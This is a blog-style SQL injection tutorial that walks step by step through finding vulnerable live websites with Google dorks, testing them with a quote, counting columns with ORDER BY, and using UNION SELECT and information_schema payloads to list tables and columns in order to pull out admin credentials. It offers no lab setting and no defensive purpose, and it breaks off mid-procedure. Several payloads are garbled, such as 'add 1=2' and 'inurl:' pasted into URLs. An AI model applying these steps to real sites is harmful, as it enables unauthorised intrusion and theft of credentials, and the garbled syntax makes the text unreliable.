Prajwal Naik - Website Attacks

SELECT is used when you want to read (or select) your data.

INSERT is used when you want to add (or insert) new data.

UPDATE is used when you want to change (or update) existing data.

DELETE is used when you want to remove (or delete) existing data.

REPLACE is used when you want to add or change (or replace) new or existing data.

*here we use manipulation of data.

what can an attacker do with SQLi?

An attacker can use SQL injection to bypass authentication .

An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.

An attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.

An attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an applications availability until the database is restored.

An attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.

In short attacker can : 1. ByPass Logins

2.Access secret data

3.Modify contents of website

4,Shutting down the My SQL server

Finding vulnerable website.

1.Finding Vulnerable Website

Best tool for SQL injection is Google. We can find the Vulnerable websites using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. But we are going to use inurl: command for finding the vulnerable websites.

Some Examples:

inurl:index.php?id=

inurl:gallery.php?id=

inurl:article.php?id=

inurl:pageid=

copy one of the above command and paste in the google search engine box.

Hit enter.

You can get list of web sites.

We have to visit the websites one by one for checking the vulnerability.

Eg: www.site.com/inurl:index.php?id=1

2.Checking the Vulnerability

Now check the vulnerability of website. In order to check the vulnerability ,add a single quote () at the end of the url and hit enter.

Eg: www.site.com/inurl:index.php?id=1

If the page doesnt change or showing that page not found or showing some other pages. Then it is not vulnerable.

If it showing any errors which is related to sql query, then it is vulnerable.

Ex: Warning: mysql_fetch_array() use right syntax near line 1.

3. Finding Number of columns

Now we found the website is vulnerable. Next is to find the no.of columns in the table.

For that replace the single quote() with order by x-- statement.

Change the x from 1,2,3,4,,5,6,x. Until you get the error like unknown column .

Eg: www.site.com/inurl:index.php?id=1 order by 1--

..

..3--

. 4--

www.site.com/inurl:index.php?id=1 order by 5--

If you will get error at 5 then no.of columns are x-1

I.e no.of columns 5-1 = 4.

4. Displaying the Vulnerable columns

Using union select columns query we will find the vulnerable part of the table so, replace the order by n with this statement. Change the id value to negative i.e index.php?id=-1 .Add add 1=2 before union 1=2 is false.Replace the columns with the no from 1 to x-1 separated with commas.If the no.of columns is 4 so query is should be

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,2,3,4--

Then the page will show an error which contains numbers less than x-1 or equal to it.

Let's assume that error showing 2.

Replace the no.2 with user(). To find user column.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,user(),3,4--

5. Finding Version

Replace 2 with version().

www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,version(),3,4--

It's important to check version.

6. Finding table name

As i said finding version is important .if the version is 4 or below you have to guess the table name.

If you get version 5 then,

Replace the 2 with group_concat(table_name) and at the end before -- add the

from information_schema.tables where table_schema=database()

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--

Now you will get all table names. As we dont need all tables, select tables which is related to admin or users.

So let's now select admin table.

7. Finding column name

replace the group_concat(table_name) with the group_concat(column_name) as we have to find column. And Replace the

from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=mysqlchar--

Find MysqlChar() for Tablename:

First of all install the HackBar addon in mozilla

goto SQL - Mysql-MysqlChar()

A window will be opened, as we selected admin table so write admin and click ok.

And it will give some code in brackets.

Copy and paste in the place of mysqlchar.

Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(10,18,50,72)--

Now it will show the list of columns.

Ex: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password.etc.

Replace the replace group_concat(column_name) with group_concat(columnname,0x3a,another columnname).